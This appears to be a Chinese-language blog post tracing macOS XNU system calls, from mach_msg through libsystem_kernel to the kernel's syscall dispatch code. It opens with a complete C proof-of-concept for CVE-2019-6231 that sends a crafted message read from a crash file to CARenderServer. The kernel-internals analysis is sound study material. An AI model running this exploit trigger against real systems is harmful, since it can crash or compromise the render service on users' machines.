#XNU系统调用深度解析
从一个函数分析到系统调用的内核实现
#由一段POC而起
#include <stdio.h>
#include <mach/i386/kern_return.h>
#include <mach/mach_traps.h>
#include <servers/bootstrap.h>
#include <dirent.h>
#include <sys/stat.h>
#include <time.h>
#include <dlfcn.h>
#include <unistd.h>
typedef struct quartz_register_client_s quartz_register_client_t;
struct quartz_register_client_s {
mach_msg_header_t header;
uint32_t body;
mach_msg_port_descriptor_t ports[4];
char padding[12];
};
typedef struct quartzcore_mach_msg quartzcore_mach_msg_t;
struct quartzcore_mach_msg{
mach_msg_header_t header;
char msg_body[712];
};
uint64_t get_filesize(const char *fn){
struct stat st;
stat(fn, &st);
uint64_t fsize = st.st_size;
return fsize;
};
int main(int argc, const char * argv[]) {
mach_port_t p = MACH_PORT_NULL, bs_port = MACH_PORT_NULL;
task_get_bootstrap_port(mach_task_self(), &bs_port);
const char *render_service_name = "com.apple.CARenderServer";
kern_return_t (*bootstrap_look_up)(mach_port_t, const char *, mach_port_t *) = dlsym(RTLD_DEFAULT, "bootstrap_look_up");
kern_return_t kr = bootstrap_look_up(bs_port, render_service_name, &p);
if (kr != KERN_SUCCESS) {
return -1;
}
printf("[*] Get service of %s successully!\n", render_service_name);
quartz_register_client_t msg_register;
memset(&msg_register, 0, sizeof(msg_register));
msg_register.header.msgh_bits =
MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE) |
MACH_MSGH_BITS_COMPLEX;
msg_register.header.msgh_remote_port = p;
msg_register.header.msgh_local_port = mig_get_reply_port();
msg_register.header.msgh_id = 40202; // _XRegisterClient
msg_register.body = 4;
msg_register.ports[0].name = mach_task_self();
msg_register.ports[0].disposition = MACH_MSG_TYPE_COPY_SEND;
msg_register.ports[0].type = MACH_MSG_PORT_DESCRIPTOR;
msg_register.ports[1].name = mach_task_self();
msg_register.ports[1].disposition = MACH_MSG_TYPE_COPY_SEND;
msg_register.ports[1].type = MACH_MSG_PORT_DESCRIPTOR;
msg_register.ports[2].name = mach_task_self();
msg_register.ports[2].disposition = MACH_MSG_TYPE_COPY_SEND;
msg_register.ports[2].type = MACH_MSG_PORT_DESCRIPTOR;
msg_register.ports[3].name = mach_task_self();
msg_register.ports[3].disposition = MACH_MSG_TYPE_COPY_SEND;
msg_register.ports[3].type = MACH_MSG_PORT_DESCRIPTOR;
kr = mach_msg(&msg_register.header, MACH_SEND_MSG | MACH_RCV_MSG,
sizeof(quartz_register_client_t), sizeof(quartz_register_client_t),
msg_register.header.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
if (kr != KERN_SUCCESS) {
return -1 ;
}
mach_port_t context_port = *(uint32_t *)((uint8_t *)&msg_register + 0x1c);
uint32_t conn_id = *(uint32_t *)((uint8_t *)&msg_register + 0x30);
printf("[*] context_port: 0x%x, conn_id: 0x%x\n",context_port,conn_id);
char *crash_log = "crash.data"; //size is 736.
FILE *fp = fopen(crash_log, "rb");
if(fp == NULL){
printf("fopen error!\n");
}
uint64_t fsize = get_filesize(crash_log);
void *msg_buf = malloc(fsize);
memset(msg_buf, 0, fsize);
fread(msg_buf, fsize, 1, fp);
quartzcore_mach_msg_t qc_mach_msg = {0};
qc_mach_msg.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0) | MACH_MSGH_BITS_COMPLEX;
qc_mach_msg.header.msgh_remote_port = context_port;
qc_mach_msg.header.msgh_id = 40002;
memset(qc_mach_msg.msg_body, 0x0, sizeof(qc_mach_msg.msg_body));
*(uint32_t *)(qc_mach_msg.msg_body + 0) = 0x1; // Ports count
memcpy(qc_mach_msg.msg_body+4+12, msg_buf+0x1c+0xc, 736-0x1c-0xc);
*(uint32_t *)(qc_mach_msg.msg_body + 4 + 12 + 4) = conn_id;
kr = mach_msg(&qc_mach_msg.header, MACH_SEND_MSG,736, 0, 0, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
if (kr != KERN_SUCCESS) {
printf("[-] Send message failed: 0x%d\n", kr);
return -1 ;
}
return 0;
}
里面的macho函数mach_msg()
到底后面执行到哪里?于是展开一段追踪
从ida的导入表中可以看到这个函数实现在libSystem.B.dylib 顺便说下,这个动态库实际上只是一层封装,里面导入了/usr/lib/system下面的动态库。
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 2.1
frame #0: 0x00007fff79299694 libsystem_kernel.dylib`mach_msg
libsystem_kernel.dylib`mach_msg:
-> 0x7fff79299694 <+0>: pushq %rbp
0x7fff79299695 <+1>: movq %rsp, %rbp
0x7fff79299698 <+4>: pushq %r15
0x7fff7929969a <+6>: pushq %r14
Target 0: (CVE-2019-6231-poc) stopped.
调试可以看出mach_msg实现在libsystem_kernel.dylib之中
(lldb) dis
libsystem_kernel.dylib`mach_msg:
-> 0x7fff79299694 <+0>: pushq %rbp
0x7fff79299695 <+1>: movq %rsp, %rbp
0x7fff79299698 <+4>: pushq %r15
0x7fff7929969a <+6>: pushq %r14
0x7fff7929969c <+8>: pushq %r13
0x7fff7929969e <+10>: pushq %r12
0x7fff792996a0 <+12>: pushq %rbx
0x7fff792996a1 <+13>: subq $0x28, %rsp
0x7fff792996a5 <+17>: movl %ecx, %r13d
0x7fff792996a8 <+20>: movl %esi, %ebx
0x7fff792996aa <+22>: movq %rdi, %r14
0x7fff792996ad <+25>: movl 0x10(%rbp), %eax
0x7fff792996b0 <+28>: movl %ebx, %r12d
0x7fff792996b3 <+31>: andl $0xfffffbbf, %r12d ; imm = 0xFFFFFBBF
0x7fff792996ba <+38>: movl %eax, (%rsp)
0x7fff792996bd <+41>: movl %r12d, %esi
0x7fff792996c0 <+44>: movl %edx, %r15d
0x7fff792996c3 <+47>: movl %r8d, -0x2c(%rbp)
0x7fff792996c7 <+51>: movl %r9d, -0x30(%rbp)
0x7fff792996cb <+55>: callq 0x7fff79299170 ; mach_msg_trap
...
mach_msg_return_t __cdecl mach_msg(mach_msg_header_t *msg, mach_msg_option_t option, mach_msg_size_t send_size, mach_msg_size_t rcv_size, mach_port_name_t rcv_name, mach_msg_timeout_t timeout, mach_port_name_t notify)
{
mach_msg_return_t result; // eax
mach_msg_option_t v8; // er12
result = mach_msg_trap();
if ( !result )
return 0;
if ( !(option & 0x40) && result == 268435463 )
{
do
result = mach_msg_trap();
while ( result == 268435463 );
}
v8 = option;
if ( !_bittest(&v8, 0xAu) && result == 268451845 )
{
do
result = mach_msg_trap();
while ( result == 268451845 );
}
return result;
}
通过调式和ida反汇编mach_msg函数可以看出,最终会调用mach_msg_trap这个函数,再跟一下
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 3.1
frame #0: 0x00007fff79299170 libsystem_kernel.dylib`mach_msg_trap
libsystem_kernel.dylib`mach_msg_trap:
-> 0x7fff79299170 <+0>: movq %rcx, %r10
0x7fff79299173 <+3>: movl $0x100001f, %eax ; imm = 0x100001F
0x7fff79299178 <+8>: syscall
0x7fff7929917a <+10>: retq
Target 0: (CVE-2019-6231-poc) stopped.
这个函数后面会调用0x100001f系统调用,可以小结得到系统库封装了最底层的实现,最终通过系统调用进入内核。在用户层到这里已经就到头了,无法再跟进。
#XNU内核系统调用流程
系统调用发生在内核之中,那么最开始处理系统调用的地方又在哪?通过intel官方文档可以找到
SYSCALL invokes an OS system-call handler at privilege level 0.
It does so by loading RIP from the IA32_LSTAR MSR
也就是内核需要将系统调用处理函数入口放到IA32_LSTAR
model specific register. 在内核源码中对应在osfmk/i386/mp_desc.c
的cpu_syscall_init(cpu_data_t *cdp)
函数之中
/*
* Set MSRs for sysenter/sysexit and syscall/sysret for 64-bit.
*/
void
cpu_syscall_init(cpu_data_t *cdp)
{
#if MONOTONIC
mt_cpu_up(cdp);
#else /* MONOTONIC */
#pragma unused(cdp)
#endif /* !MONOTONIC */
wrmsr64(MSR_IA32_SYSENTER_CS, SYSENTER_CS);
wrmsr64(MSR_IA32_SYSENTER_EIP, DBLMAP((uintptr_t) hi64_sysenter));
wrmsr64(MSR_IA32_SYSENTER_ESP, current_cpu_datap()->cpu_desc_index.cdi_sstku);
/* Enable syscall/sysret */
wrmsr64(MSR_IA32_EFER, rdmsr64(MSR_IA32_EFER) | MSR_IA32_EFER_SCE);
/*
* MSRs for 64-bit syscall/sysret
* Note USER_CS because sysret uses this + 16 when returning to
* 64-bit code.
*/
wrmsr64(MSR_IA32_LSTAR, DBLMAP((uintptr_t) hi64_syscall));
wrmsr64(MSR_IA32_STAR, (((uint64_t)USER_CS) << 48) | (((uint64_t)KERNEL64_CS) << 32));
/*
* Emulate eflags cleared by sysenter but note that
* we also clear the trace trap to avoid the complications
* of single-stepping into a syscall. The nested task bit
* is also cleared to avoid a spurious "task switch"
* should we choose to return via an IRET.
*/
wrmsr64(MSR_IA32_FMASK, EFL_DF|EFL_IF|EFL_TF|EFL_NT);
}
wrmsr64(MSR_IA32_LSTAR, DBLMAP((uintptr_t) hi64_syscall));
也就是系统调用会由hi64_syscall
函数处理。这个函数实现在xnu/osfmk/x86_64/idt64.s
之中
Entry(hi64_syscall)
Entry(idt64_syscall)
swapgs
/* Use RAX as a temporary by shifting its contents into R11[32:63]
* The systemcall number is defined to be a 32-bit quantity, as is
* RFLAGS.
*/
shlq $32, %rax
or %rax, %r11
.globl EXT(dblsyscall_patch_point)
EXT(dblsyscall_patch_point):
// movabsq $0x12345678ABCDEFFFULL, %rax
/* Generate offset to the double-mapped per-CPU data shadow
* into RAX
*/
leaq EXT(idt64_hndl_table0)(%rip), %rax
mov 16(%rax), %rax
mov %rsp, %gs:CPU_UBER_TMP(%rax) /* save user stack */
mov %gs:CPU_ESTACK(%rax), %rsp /* switch stack to per-cpu estack */
sub $(ISF64_SIZE), %rsp
/*
* Synthesize an ISF frame on the exception stack
*/
movl $(USER_DS), ISF64_SS(%rsp)
mov %rcx, ISF64_RIP(%rsp) /* rip */
mov %gs:CPU_UBER_TMP(%rax), %rcx
mov %rcx, ISF64_RSP(%rsp) /* user stack --changed */
mov %r11, %rax
shrq $32, %rax /* Restore RAX */
mov %r11d, %r11d /* Clear r11[32:63] */
mov %r11, ISF64_RFLAGS(%rsp) /* rflags */
movl $(SYSCALL_CS), ISF64_CS(%rsp) /* cs - a pseudo-segment */
mov %rax, ISF64_ERR(%rsp) /* err/rax - syscall code */
movq $(HNDL_SYSCALL), ISF64_TRAPFN(%rsp)
movq $(T_SYSCALL), ISF64_TRAPNO(%rsp) /* trapno */
swapgs
jmp L_dispatch /* this can only be 64-bit */
继续跟下去,会得到如下执行流程
syscall-->hi64_syscall->L_dispatch-->ks_dispatch-->ks_dispatch_user-->L_dispatch_U64-->
L_dispatch_64bit-->L_common_dispatch-->hndl_syscall
/*
* 64bit Tasks
* System call entries via syscall only:
*
* r15 x86_saved_state64_t
* rsp kernel stack
*
* both rsp and r15 are 16-byte aligned
* interrupts disabled
* direction flag cleared
*/
Entry(hndl_syscall)
TIME_TRAP_UENTRY
movq %gs:CPU_ACTIVE_THREAD,%rcx /* get current thread */
movl $-1, TH_IOTIER_OVERRIDE(%rcx) /* Reset IO tier override to -1 before handling syscall */
movq TH_TASK(%rcx),%rbx /* point to current task */
/* Check for active vtimers in the current task */
TASK_VTIMER_CHECK(%rbx,%rcx)
/*
* We can be here either for a mach, unix machdep or diag syscall,
* as indicated by the syscall class:
*/
movl R64_RAX(%r15), %eax /* syscall number/class */
movl %eax, %edx
andl $(SYSCALL_CLASS_MASK), %edx /* syscall class */
cmpl $(SYSCALL_CLASS_MACH<<SYSCALL_CLASS_SHIFT), %edx
je EXT(hndl_mach_scall64)
cmpl $(SYSCALL_CLASS_UNIX<<SYSCALL_CLASS_SHIFT), %edx
je EXT(hndl_unix_scall64)
cmpl $(SYSCALL_CLASS_MDEP<<SYSCALL_CLASS_SHIFT), %edx
je EXT(hndl_mdep_scall64)
cmpl $(SYSCALL_CLASS_DIAG<<SYSCALL_CLASS_SHIFT), %edx
je EXT(hndl_diag_scall64)
/* Syscall class unknown */
sti
CCALL3(i386_exception, $(EXC_SYSCALL), %rax, $1)
/* no return */
hndl_syscall
这个函数会系统调用分为hndl_unix_scall64
、hndl_mach_scall64
、hndl_mdep_scall64
、hndl_diag_scall64
四类分别处理
这里以hndl_unix_scall64
为列
Entry(hndl_unix_scall)
TIME_TRAP_UENTRY
movq %gs:CPU_ACTIVE_THREAD,%rcx /* get current thread */
movq TH_TASK(%rcx),%rbx /* point to current task */
incl TH_SYSCALLS_UNIX(%rcx) /* increment call count */
/* Check for active vtimers in the current task */
TASK_VTIMER_CHECK(%rbx,%rcx)
sti
CCALL1(unix_syscall, %r15)
/*
* always returns through thread_exception_return
*/
这里调动了unix_syscall
函数,这个函数在bsd/dev/i386/systemcalls.c之中实现,里面进行了一些权限检查
以及根据系统调用表去调用对应的实现
thread = current_thread();
uthread = get_bsdthread_info(thread);
// regs is derrived from r15 ...
code = regs->rax & SYSCALL_NUMBER_MASK;
callp = (code >= NUM_SYSENT) ? &sysent[63] : &sysent[code];
// ...
vt = (void *)uthread->uu_arg;
// ...
memcpy(vt, args_start_at_rdi ? ®s->rdi : ®s->rsi,
args_in_regs * sizeof(syscall_arg_t));
// ...
error = (*(callp->sy_call))((void *)p, vt, &(uthread->uu_rval[0]));
目前执行的流程如下
hi64_syscall
L_dispatch_U64
L_dispatch_64bit
L_common_dispatch
hndl_syscall // rdx, pushed in hi64_syscall
hndl_unix_scall64
unix_syscall64
error = (*(callp->sy_call))((void *)p, vt, &(uthread->uu_rval[0])); // now we're there
#参考
https://www.binss.me/blog/interrupt-and-exception/
https://0xax.gitbooks.io/linux-insides/content/SysCall/linux-syscall-2.html